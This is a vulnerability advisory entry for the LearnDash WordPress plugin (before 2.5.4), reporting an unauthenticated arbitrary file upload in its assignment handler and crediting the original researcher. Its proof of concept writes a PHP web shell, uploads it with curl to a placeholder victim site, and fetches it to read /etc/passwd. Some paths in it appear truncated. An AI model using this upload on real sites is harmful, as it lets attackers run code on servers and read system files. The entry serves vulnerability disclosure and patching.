WordPress Plugin Vulnerabilities
LearnDash < 2.5.4 - Unauthenticated Arbitrary File Upload
Description
The plugin does not have any authorisation and validation of the file to be uploaded in the learndash_assignment_process_init() function, which could allow unauthenticated users to upload arbitrary files to the web server
Proof of Concept
$ echo '<?php echo exec("ls -la /etc/passwd");' > shell.php.php $ curl -F "post=foobar" -F "course_id=foobar" -F "uploadfile=foobar" -F "uploadfiles[]=@...hell.php.php" https://victim.tld/ $ curl 'https://victim.tld/wp-content/uploads/assignments/shell.php.' -rw-r--r-- 1 root root 2385 Apr 14 2017 /etc/passwd
Affects Plugins
References
Miscellaneous
Original Researcher
Jerome Bruandet (NinTechNet)
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2018-01-06 (about 6 years ago)
Added
2021-10-20 (about 2 years ago)
Last Updated
2022-04-14 (about 2 years ago)